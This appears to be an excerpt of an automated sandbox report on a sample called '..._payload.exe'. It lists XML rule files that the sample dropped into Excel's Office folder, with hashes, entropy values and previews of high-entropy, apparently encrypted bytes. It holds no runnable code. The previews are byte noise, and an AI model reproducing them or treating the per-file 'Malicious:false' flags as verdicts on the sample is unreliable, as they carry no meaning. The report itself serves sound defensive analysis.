                                                                                                                                                                      Preview:<?xmlX..Fe......w...*,..:.....V.l.D.h.z...Z....\1.I.I....6,...T./.....Gb.*.U~5...ju..DC.L..............l....L7......@...C.N...7>..US...N...L.....NA7...F{.Z.pB.....q.......u.$).......s...F.......4.eKdR9P........^....ce.......J<......vH.?.\.%.!!m.X.wk8.uf.~..../...."....v3,d.z.a$.X>.I%. ..)2Dw.:].H:.Ds...N...LN...a......vws?>.X..ML..zi....|7.\.-.M.R-..j.....-.f.\......= ..j.K~..ba.]y.l..Ph.p`...5....K.P.W..j.5Y.'n....T.4...tO.....*)U.Nj.dn#...Yi.....T.E.'.1.&.R,.-.~.[...kC.v...y...K.N.9....~.-..s.j....uh.$/.r..b..H$.s.|>.<..\.8Q......."...N.?Y...W.[%....'...;......02..qu../.rU.......VaW,Xz..iS^..../.....=.x......YM..#..J.fC..P...%...B....Ij%....%....7.d.XH..;q.6H3t7Pk...A&.X..[Y...4n5....@5.%I...J......l.xl.q1.}.T.. .J.{0...)..uQG.y|..0~.].@}....\3tl.e'.^.$...j..(4....zL./.1.g..H..Ce....O.......k.\.....F.>..L5....d.).....c.@|.[.-..A2.?4&E..I.I.Y.8.Y..9_'.Q0S'$....fB.v.t.l.~......Lf....(].^u.i[Ru....gs..)...#..j08d.2V.....RpQe..e1...$..h#..q....4

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11768v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2487
                                                                                                                                                                      Entropy (8bit):7.923820983510028
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:wCEHHzeZlCIOjuuhGMWBK03lI4rXWHJ0+MThemszbbo/kQbOezGaBiGIbfW/D:vlejuKGMMX3lIiXAJ0+SemsfbsjbO2Gs
                                                                                                                                                                      MD5:E4A3AD735EC4A39ACD8FC0611FC1AF7A
                                                                                                                                                                      SHA1:2E76C6B6CEF1877418CD47B0545ECA24F678A7A7
                                                                                                                                                                      SHA-256:100072956F58F55088B39BAAA0058F742F11A945C69B7A1240584B63A324AF24
                                                                                                                                                                      SHA-512:AB026F784DF81187E40157FD3C8B10962045F4A6E1858319DD509AB7D602E1124F30C0AC24436BBF88B84D0697A73CF0C89AA346E3ED51A5B80E778380AF19EF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.l.P.!.....(L.g....I{y.P..+VjG.,t.Ga.9.".b.....[...Lpx...,h.....o.....Re...r....r....(.....\;?.;T\.Y..xY..`..\..]a........a......iA,=*.I....E..,k..7.9.8o.r.I...t....6..#....{..$.`tq.... .R.'.}...H..?.c.&W..`.&Y...ji.s..n0.......l.x.}........x.O/.+..;.._..<:..b.Y.Y..y..$lA.4..>.G.k.--.....G........%(?.0'....W.M1S..p..i..uO..#.A.n.K{.F7....;....C.j..xU..{.l>.FU....t&%.T..Okp.Z..@.....VB.-..c.@..K.\....m;...i{zj.....'.....Jv.........9...>..c.T.}6..Sk)/.qG.kEp...%i2.{...}~...w5....T...PHl|...?X..[.....{....=..*:h...Ld0....].'d.......`.+.....Y.U,.....u......K.-.....4|.]..........<...R..#...8;6.....-.bY........^.N........64f..R..n..r.t.J..)^....Y.'.........0....<....:.yyp.4.j....R......6c.....4.R.6.L.&.e...G-...3..kM[..s\}.W....<L1.t...P...A....F9|LR......{...T.u.YkB.....1.....sR.%..rqw.iB5.p...Y..g....0.....Rp.{O.,]....cQ.czg....B...Q.{.P,.....FAu......<..*0.CK..@....Pq......R.En..@2..x.....^..}..Ek.Q.}\..(...P.E.....@.y{io

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11769v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3132
                                                                                                                                                                      Entropy (8bit):7.939208505574324
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:8bLfUcv1o5CigqI4M+m+/DNkvPG+ql0rExmDsFbteDvQ9ACJWpHa2D:qfNW3I49DyGD0umItt39Ipau
                                                                                                                                                                      MD5:21431ED7D039D910847EB09BBC1807F4
                                                                                                                                                                      SHA1:BAA165836BCB2E3E5E413406E2BA67992B9511BF
                                                                                                                                                                      SHA-256:CD054512833CB9E442BBFD64215E7AA89817BD1215AB30308074457C090D580A
                                                                                                                                                                      SHA-512:D6BEAEFA53F41A4CC2190832D89732F20B01970EF89CED6156480478CD9A0999670697B8866875B4FF726811DDDB8CB8529E880A0BC8F874ECCF188D5AF80945
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...m.c.V.0X..,.!-.f.....s.~.\Q/.L..9.+bDH...E.D..H..FU..N.[...Ue....E..z.'6+8...I.S...Ex.....Ya..kS...nz...O...(.fp9T^[|G0..p.\......p Rn.4>._...'8.,V.j.....X.~..&..o...>.P`-JX.U.e......Ap.[..%.)mqk.#.......G.w...L.....a>.P.`..n.70..R...Z.:...a..J.|...5............H.>.s&.;...+....zn.@.T.Y..Y.{.../...]...g.T.z...`.v...?.C..d.[d...V...m...G.%.P0z...........$u .s....Xr@>....'s..,.=y...f;.)....Y...$..Q.."..t..Il.V.....'.=H{B.|"..s{....{..O..]X......e/...<...]C.8.k5.] /...[.....m...V;>...@2.vi...R....v#!..f.|..4y..(.OO.V......$.v..1.\.^.\..^.:.1J..2..%..q..+.K..$.W?...f..R...T..|...}.....D......U..~.E..=...=!...Ft.J..I.........Q...........ptP...s.eV.0...g1.....m.<T.T.s.g...../......Q ....l.........#..Y...N.F...gzr*Sa.{.c=S'[zl...0...%.]..`?.I.H.w...0.j....1.AWq..\...6...I*a..q.d.~,.}.R...).0^<.xV...Bs>..y..E.}}Cs*.I.V....]d.%.e.....L../K......VH..<.......A.!.{...r&.H!z...].S.H......F......:&.[.........T|.>.9....7...>.K..Ev'r...P.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11770v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4968
                                                                                                                                                                      Entropy (8bit):7.960395749849029
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:Rb9Gx4Y3wlpf8gaI1QOOM5GAUW5TTKHq9Vcc60jih+XiFjXW:Rb9Gx4HlpfwI1bx5/UWtmJ/n8abW
                                                                                                                                                                      MD5:AC20EE8C55C9B83A198AC7D79BF82893
                                                                                                                                                                      SHA1:7EF729882775F11E833ACAE7A1ABD5F192FC6285
                                                                                                                                                                      SHA-256:D820DEB43C95C13DB9D8316DEFC5E6A7A222365DF3F76069F1308A76D05348A9
                                                                                                                                                                      SHA-512:E8F08B30914503041C669344E9CAEC5BD5BAF8431A4CCD7EE7F5112DBC28E41A541ADA4DE8007B0FB088909B0590D0D94D761A8FB7FE76A0C253B7779F197D5F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmll7X.>.5.l$!......fJ.....*"../9.n.U.0.f.._.....cwg{.....m~..$h...........Z.....F.B........b....}RP".".9....*..Cf....|,......z.D?.D......n.F.="-.2i...U.5..Y..,.vn.u..T8.{H.^...%....tMfd......3.r....s....U~.......x.....,;g...8>(u.tf...;.rU.#&V|..1..x%.1.3.h.>...!3............>.5...X.>.a...n.....-.L.}..+.%.....5V....3..+.T^..%.Q..'..u\r....T.....Mg9.hg].L..7.((...../_.F/?.hh..eTj[...H*.......4.....Rh.b....K.j1.N1.....d..3.._wlu..^...<hJ.F..T...?.d].kwN..~....I.t........Z<\8......e..H..6.%8...$....x.u.d.p.'<..3|.1W..W)...).....p..!..4.4y...B......#=Dc.......rj@.c.H.e..S.....5=.'}.s.F"x.}J.=,5.3...I7??..^...6......]p....w....*....0q...H...,..T.[.w..&.l...T~8...=..Y..i.Dj..I.Y..3i.n)!._.x5.Oa;..p%^.-..c..r..ar......D>:?....y..*.E.x.-.6U ..3~.rf.F.`6.$.I...gh...`.>..<".y$%....H...MW!%.+2P....-...O..\zt.h.....Ne-..-...7^W....|YN..r.|<{+...`l....)h...{2N...34..4#j...v.3..@...[........b.B(ii{..k.W...5......`U..ZOR.w..Y.\$..O...x....}:..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11771v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):7596
                                                                                                                                                                      Entropy (8bit):7.974763603390122
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:BXZE7eCr7/tRExxIr6GYdjxUEk7X1SCXd8kudd:BXiqC3tREH1GyaEk7lSEd1uD
                                                                                                                                                                      MD5:F8DB4127995E035356A992A8FDC8AC55
                                                                                                                                                                      SHA1:F9DAC58F76B9EF1903C3D82E807C360C80F6A4F8
                                                                                                                                                                      SHA-256:7843F3586290BBAD6465380D60695786A5394F0E2A96C83F679B548DCA3CD40F
                                                                                                                                                                      SHA-512:8F1B5EEAA89EDD8335B245E7454B372E49BD79F004083547ABE0F5ED03085F74648D4E426D4E98B6214BF258A80470D4FA984BDFC2ACA9F40066245A51481116
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.GYFQ._..V.+.@|..*Ur.E..r#..M.....d.C.ao..U6.(.*O....Y.n..u....m.I...]....G...).Ya..Y.y.dOd.Sg.}......H..........-...A.4.....Z0..+..^....|:."...)1..wY...zd...r..z.....}..si......uV.:.yI.x...Xh.......:x{...E3.&.1.e...J..v.,.B..^*.,.:]....T...f.3.\I..].I7g).c...,'.8....T.D.......@f..}.k-.B........-.j..fX.1.G....6...bg....R.=.....[..a.w...]../=d....q....dA. ..;.5.X.+[.........d.)d.JQ..Q.].D<...}-...I(.z.H#L~..o..$.j...H...qaByZBq...m........%..TF..u.$..}"2Z.4..%../..""....U.....'..ls.V..8e.lWC..0.R......U)1'm..nZ.Q.\..........}..f.....br.p>.....(..p.#|....G..X.....G...Y...O.....()T.l.J4........5N.6H....l...o....Z...e.P.z.oq......X7.^e.{..:......;CY:-.n..*K...`....s....h. .Wm.x:.U.<.?1......^..".....I.t.....yB..3..w|.K.....6/.."cgS....&...=.MT.....[OD...0.-$Ln.Tg....8...O.0c.O5'..r...d.z.{..../dQ%]..+...F.u.l.4...yr..9.>...L.H1...dQTG.f..*.g...\....u..)..tT4.A.a....J.j.......b..M..7J.g..EV.{_.&.T>....{Q.6w:.]q..$......:<..r.^..y

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11792v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):7356
                                                                                                                                                                      Entropy (8bit):7.9751111187060735
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:GvUNkIcmwXYGV0K5DSMgNBz5aVMRL5ybf7KRx:cWcHX594z5aV6L5ybwx
                                                                                                                                                                      MD5:EE1DA730DC78A7E59B2A0196B8AB09B0
                                                                                                                                                                      SHA1:4CBC9DC867F26089368640FEB470B48A639E343D
                                                                                                                                                                      SHA-256:98100C430D789D4E6B6DB7C6FDC54388F15018A4E4773A7DB89D73FF292FA5E2
                                                                                                                                                                      SHA-512:F401E7A1DDD03F5896306CAB6CC243C780D8FA172D88D7F0FEFA3F77E9F77E51BFFBE09412E3F3523BE55C701816070795025007A4224792FD5EAD9DBF23BE77
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.MD.uoD4..5.^........y....<..8."....L....z..%.....uef....V......pxY1..T....DmK...W..P}L....#[}....V..k.ks..w,J...5.....;.-cZ'.sh6.csX.#..g.y-i.......z.)g..6......v......... .....Ldq.*...FE...e.....s&X|9..,.......-......?..9..]p..R....J.B...G..=..oV.Z...5..M6_..g..<...^.....o.....dH..R.;..n...Y..Q..u.DV...F.....n.5.I.&_..p._...!.$o.x.,.\!r..o....F..w.......*....l.(.].W..D..c........]=k."q...y....|..u-S.....s.#.....o."#9V.K~.SL...?......I%.7U..]kJ..|....F..&i..8=p~......<..l......s..S>..w.G.g]...X.I....B...P.K.W$.........bT....&..o.V9.B"..-$m.a.o+..8.!.D.....h....MJ..rU..3Ej.H.N...l..b..Z..:..7.......Hr...xy.:.>;O.RS&+..C..{;..[v.k\....v!...b.6.f0s..g..qL.........x..&Z3k.j4.hoN.j..W.4l......e...R ....kJ.\.>....G...../..[.P.L.'u..O.)....x..D../..&.+o.8{3..n...o.f..m..L......X.........5N..\a.....fs...;A%07IY_CO.9...$..q...Go*..`.e..M{[T.Y..@S.sH.+.?..f.a-.p...(|+.0..D.r.{4Iy.2"B.5s..lc0..(}.B[...n.{Ox.{.$-....D4..}.q..+/..... .T.9.-.Ue ...`.=C

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11793v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1551
                                                                                                                                                                      Entropy (8bit):7.856287749995206
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:3yCSe4J91d5WyPYoZo66gRCwCL3nSC1372WYD:3y9syPXFPRNuSqKb
                                                                                                                                                                      MD5:ADB731BABF54B097BF9A4FB00EAD6960
                                                                                                                                                                      SHA1:F30828E54ACA7D8F987AF6CD121D1B483C537B62
                                                                                                                                                                      SHA-256:A28FF05C1E3170201C1AD59ECD020A9A55457A79D6FE95AA0FE99B67DC59A375
                                                                                                                                                                      SHA-512:FC4EC9CDDC848C3DFFAABA3F3F87DDD23D54B606F42A726679EC6DBC95BDF19208499F1214E18AB6704444C44CC99AD8F1267D82F2DEE893A233C9B50D98CF6A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...s........F=q..[k......@./TmL..8.`....b.%_.. ..t...SK..y'.U.B@..P...X..:.J`..jl.&..)C`..Jc.lzEQA....1*9ZW...)X...P..0.[I.'G....y....x..v..o...I...`"f..Y6..U.....k....s..39..P.........4KPR....D2\.._.Ie.z}.?....Wb"..6..q.'......x.).h.wk(K...r.`..q;..:..\..t..j.2..sm.m.:(.......l.."r.;...j..4,..vG.w..>...L]7.........S%W!y...g....b.B.u.9...:,sY.}.....)..z.H....+.fgP.7..3.]..R.w.(...&......QW.......PU..$.....a..l.s.....\.i..F....|)e...1..a1I.0..G..R.a)-@D.....!.(.........}.s.x.t..k5...}..G..e.....G.8....<M.."..._..@...O3.......WQ....`. %W{.A0..*....3\...6.8y.~.Ui@..a......T.Q.!.o..b..3....b............H...9..3.........;......R.)....R..#...&..$.j[{.>........'.....:..[...N.T.d..)T.q,............8.....`....p#...|)!.......{ .&>(..C8v..'R.\3XA[..w.l......o./...hl..8...XR..j.qdy....Hh..J..+..[..%`h.....Z..('.SLwd........x.J...../.=w.........uE..'....&W...;... ..BP.+...%{63o/..TPe`M.....X+.~^c'..y. .?.y.}...8w..Y ...H...atW..r#6.^..'...'"TEG...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11794v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1716
                                                                                                                                                                      Entropy (8bit):7.882191895116744
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:/LauuJtt6ZEgjdnl9mWUb970vYHKPcO2jD:Gu2twjQW+HKPcOw
                                                                                                                                                                      MD5:CF22E21AB49343ED85F152B3227A4716
                                                                                                                                                                      SHA1:3F8BB6F78A63B43DD189E6649EC8EA8DA534C35B
                                                                                                                                                                      SHA-256:99A39EDB29567F4C6790A0F6300FB123EAD70972E30AC450D9850527FD35BCC9
                                                                                                                                                                      SHA-512:9022EDFEE2D3A2B1CE592E41AF9CFE5E5062D1937F1AF69A8C2F3B4EA18C002602D33B18FDDDC4618030F780F3B6C6C0B564275FAD7DF184E29B8F5DCBCA7B64
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..".=......v.q. >..s..yD...+.P...M4k...o{....tC.$.YU#H.KoSq.P@=.E.. ,.,/?] ...a.WBf..X|.;....{..&.W.DN......9.....T......h......'U..vz.#.?.@q.."..IQ.......$yV..cd...[..Q..-..4~...V>.. (OC.......h..K.E!.}Wqy.:H...MAp.....5.(!..e........{.....u...;.G.........&_1...t.E....!...n...V.q.......`.;.q..%...j..).......$.TK\h[S.f<.%?...F.u..jx..b.>..\..y.....7.....%q/.r.*=.-....8.......O)..z.s...J....W.z....@...I.U=....E0[..2../Qm....|...)1.........[.......`......p....K`G.~E...q.O....Z..r.....E.ZQx..D..;E-.E.jl_+.:.\A`.......SI.....,.mh......#..6+..2CDm....wgc.?.V...S-...."....e.....{....<.B..]..'}.{...1.V.8..!j..W..E.{b6.4....9.....B.... kL?..Jn..S.6uN.........4\9....%....[...?SR.....;:0...A._.....{ls.... .M;....@...<..:.Y...5Q...F8.}..i.....GY5....HU...w.t..R#A.@.6...*...p|...$.:.q......+....g.....xk.D=....cq.....>.n..\}..w...M.?.|...V..S.......P..N.M.: ..;...0X........D.e.....Qi.or_T..%Qr.?..Dl.q+..+.do.{..7.......,S.j$4..U...M.......

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11834v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1737
                                                                                                                                                                      Entropy (8bit):7.879784324303736
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:PUlCJGwBjX3qB0CeQi8wZiJzka+rdb0UpkVzpD:clCJN9qBaQlwYwa6axB
                                                                                                                                                                      MD5:407155AF453496D05826550B8549FE34
                                                                                                                                                                      SHA1:E25A9B96182B175A2C5342749844D389E0D7580E
                                                                                                                                                                      SHA-256:F2F14F1E4DD8B76CD5BF1FC743B35773A58A57E3A42DC90B1545B2BEB7762BDD
                                                                                                                                                                      SHA-512:4CB4BAFFC799DE69E906FAC259EC3D07EE27B5B9DA17A37287CC36EB667BEA68194EA06AAF059540863084F2D9918335EAA108D49223860F53A32EDA99D63942
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml......../.....:H.F.lq..].....0YU...=..p......]..j.....5.xx.\.K...^....Fh..H...=I..........&.#...G.......R..U....1..8...zS..:W...X.4q.5.....W..._....UwB.`.8.;......}.g..4<;....A}g....t.....o...+.#.R..r....@.p>...c..'..9....M...^..Km........o.e...z..K....{'.gg..n.....P[?{4u..6.L...L.Q.....@.:M%..~.Om....v...k2.=_.3H...Z.....*.+...}..........@.....9.1."[8...{..g....{i.I..z...;...|..@.....ss'z4m...~.[..n.!.bB..k....c..a..A..kOr.\.ls..7.'.,e.q.7Tw...i..CD..R.ufT..l/.hd...H...C?...^$4D...{..d....u..l.4.U.{...QD.-.V.x..e..=.......n.. 6{9.h.u.......m.."..z.ZR..k..<.1.S6..X......FDh@D......Q..L...s.5zeJw.....2m....+I.J+.....dU.7C7......e;.\u..mC.Ps..1..).&.kN..h.-..P.W.i.&........*S...\...3..].9_$.N,kn.|...[.F..g...I..O^.G_B.t..BrNi..C.....Nx.R=..1....A~s7t...-.....w..TG!'.I7.`K...2......7...f.._.z..(~..k.Cu.<..pC8..j3.a..+8N...l...a........O..^..P.C.w:.)..Oy..TJKh.-...$.@F....t.k\.t.Q{...r...%..eY6......x(....3....R..P{...MoA..lw|........N..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11882v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1448
                                                                                                                                                                      Entropy (8bit):7.864324903304142
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:6mqxJnFW6ULEb0fUVltp5gz3WyWch0hS7G2Y4dOzGlAGXQorlCn6oCywMv12bD:6d7FWrE1jPy3Asg4dOzYAGgjAywoOD
                                                                                                                                                                      MD5:6E874E9B210EBE0E8571111F94815297
                                                                                                                                                                      SHA1:C8143DDB999A866FD46212F9C2AAE6CF302FCDEE
                                                                                                                                                                      SHA-256:1DB203D5446BA7D22E8A61F711D539546DA30B1C562418A2155BDA41893347F5
                                                                                                                                                                      SHA-512:B6363936DE0441F9682A8F0AADBF8692B06EE1A7D2E2D2E55447031CF989FE671BBBC3255EC24D1F8DA30B331E6B4D0A8D804B726AB619FED8ED37AFE0EAB9F1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml/.8..>....N....k.deK.Bcw.\..]uKs.s&O...",.?..v.`.$I.$!..B.=Y....f.6p#.|J.M.(8qh].0"..S.R7....K..u..`"s...*.[.....- .Q/.Pc..}j...d..4!/..X..I.F..tN.....K8_1N.a(A^.8.....XM....;.......9.m..&.wj.d....J2....t.9.P&?.:..W.e(\...~.*..L.osT..~.7.6*a..t.Tg.. 3..fp..../...O.h..4.}..B|x]...:.Q......nH..5...T|...^.sD....!.+..h.....x.cqk.U.A.8..a.].#...^.a.. .........S;....H}..SX...`...>A.K.......!>G.b...6..9z......_..5..Z.v.R.M......[?.d./.[.i,i..`"..Pd=..>{M?._Y..mi.x...{.g)..+..r].;...%.q....i.O.z....q.5.&.`....k{X.5n....]...N........).U.iu..N4...|...Ey..|.y...a.t8^K(..K.`..Z..O.a......G.....N.b._5...ADHi.O.j`D..;..|.-m).......f.(.s....r!.|......\...]Y...Xn...m...N.O.Vr.hr.G6A.bMf..,k.H...........!B......x...^...'.\..e...{.p*.R%.z.K.. '...p..2.I.8...H.Mf.>..DW.....4r..#..e...w(..=..x.vP....p.9.W{.P..[z.....'j.Y..-Kx;.}.u..'..wF}S..3.Rt....#IR6l.G.z.FN,&.E.......h;(..Q].Mz.!....r...X.X..[....9.K_|.........\.....%.>.....`....s#.Y.H.82..A.o\m.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11890v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1419
                                                                                                                                                                      Entropy (8bit):7.856122520384379
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:Dom7Js5kRRDtyx1rfpGLuo0ifh9Jph81Ivcl+IiJPe9M063C4VLEuea2bD:zW5m1tyx1gLuPifh81IvcknJW9M9C4iP
                                                                                                                                                                      MD5:32BE55689B4E0EB9ED116574A1E59127
                                                                                                                                                                      SHA1:10A74D1C7E0C604EA47AD70BB64CC3335C986231
                                                                                                                                                                      SHA-256:9F0E1C1F2FE35D8954410463CCC8702A34C33E66C3FDFE382ECA0BF924658A5B
                                                                                                                                                                      SHA-512:1F8EA6D019CC1C4D570E78222E31F15A43B92F7D863F0FFB6609AB45A31C78C4AF54C6089EBD659584DFF1F3B671CDDDBD9D55C606521347C8A567C568A73B5C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.E...#...6O$mR.,.y..O.. .G..6x...T.k.[Q..q>............Q.y5......%...Q..6.^.t....G.Tf..u?.h.V?.b..d@$.L;..s4.$...P..e."-...M......L]..m..}.c.....!?3.F./....Zffm...N...oa...HAUt.]r....Ld.....*n...9!.fY..o=.Oh..7c...O..s..z@............f...k...rrg...)%.#.....<j."...P#.$.=........1..~:_.F(.#..-...4.@J.{.l;*W.p...;....`~v!......(.>_...S...t#..K.@g..t..b0.D....-.4....8.^j..}S......!..9.A.<..7..-.g.g....P.KY2....Q.Z.q;...O.uq..4m......B.....&..3r..+..f..ss...}..r...S......(....)`..B.V....8../..$..Y'..u.F..T.2......f....#..v.X.X.G.6.....E...d.e.*....W./...!..........g.....?..Hr..O....g..;.....H.-......I"ytK.....K...p`>8..KtCj'B.)..wCk6h..oC8.k..G...|vS.K.......u*.!....c.F`.....C...3.IO(..-fwU.NH.......Qg..yk.r......._......he~...X.&[&+{.$.....F..YP.I..R&......../j...9.-g.m....v..+hcP\...rn.Y2.Z....<...G..@%.md....{..m.....`)3.<.,K.........}l...G..`...>...{K.`..6.m..U...._$..B.P..+.&`.{m.blHj...v..n<=....=.[j.b#.>KW./.R..=...n..|*...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11930v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1546
                                                                                                                                                                      Entropy (8bit):7.874856185467311
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:Rzw8I9GU5Gw5KZd/pifjsoh5eYMmu7koOK8MeR8bzFo/iOA82MJ3r0NXXPl6CiiL:Nh+G2N8fizFMd1vFozA8hgVfILsD
                                                                                                                                                                      MD5:41D78B0ECB2DEC4158CFB32B6C3EC784
                                                                                                                                                                      SHA1:5936801C4B8F7B691815358C14591C09D45147A0
                                                                                                                                                                      SHA-256:334D18334D9D74AD54CDE5D3ACD18350449F15A164347097956405BC4BC8DBF7
                                                                                                                                                                      SHA-512:E7033CB9460215B300DF98362BCC70D233358235B0DF334762E64F209BDF3A41EA9F052924D679E5C5ADF8F446B7D6CABD46263DA1E974BB1E0C7BF43ED1C603
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml>....m.......>.......j..0aY..@..*\5..."........<.,.n&..CI.......l0kSA..;.w..#........F.-..Ea......7...T.F]l..g...A..]....U..We.*......9.F..K+...5..@.f.u.9%.0@y).?.:nu.g...1Q.A...:].?..y..I3.=.Ac.2.G.J;....um.F....{...A.N....Y<S]...I....f...h...8<<..6...M$...{.E..7${.L?5..$..vt...j.......i..T..`....,.B.d6......F.v."9.....w..^$79Sa.q....[..<....M....:...........3i...o.m6z..."....2..&...JM....w......$I.p~.`.o.2......i.}....*O.?6..z5".<#..D...yO+0\....t..R....8..A~h(.Lm....T+.O'.n....)X.....E..$.Tx`.{...y`..`.!r..]...586rY.j;.T.c..g.l?k@..dT1....*?....k$^.. `.z8K...CY,-1"5.8.Q....1x.5.......M..d@...+........!\.`..w.z..yT......q....;...nu.<..J..$~..U.o.&wB3.!......k..1H..U.(..x......~...B...G.rLq.P... v.......{y*......S..?...5...4..LF0.A...2"..*}F...G..I..,.m...{@..;...!si).<z;...#N..i%0v.].]...s..".4HA...#Q.G#.......xx..J.0...%.Fz.)G.....\T.^.).Q.....$...1.>4....V....6...).$...ajc.[..I..H..V7..d..e'...Y.21....*.K.{.-.....d2..J*.l..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11931v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):903
                                                                                                                                                                      Entropy (8bit):7.806690027839971
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:wHy1eO0leBJpzUwqeribRWqvwEwexbumNnNv262bD:wceO0leBv3qembRWqvhJpumNNvuD
                                                                                                                                                                      MD5:3170FE8FB9DD2BC6028CCDD4172622BF
                                                                                                                                                                      SHA1:7053FC7EAA860743FEB5F829BF618D2050588225
                                                                                                                                                                      SHA-256:9CD238B6246E3555814FDEAD49A340ADA4E5AFCFF0F611370CFEE3E3E78FC7A9
                                                                                                                                                                      SHA-512:222BFE1723DC5A43317204277C1CF0FC98CCB6FA72602B689203D19AB40A654B5AE9F2B8E9778A47A256F2FD53BAFCE5D1DB2F61A84C525DE81777595ED2223F
                                                                                                                                                                      Malicious:false
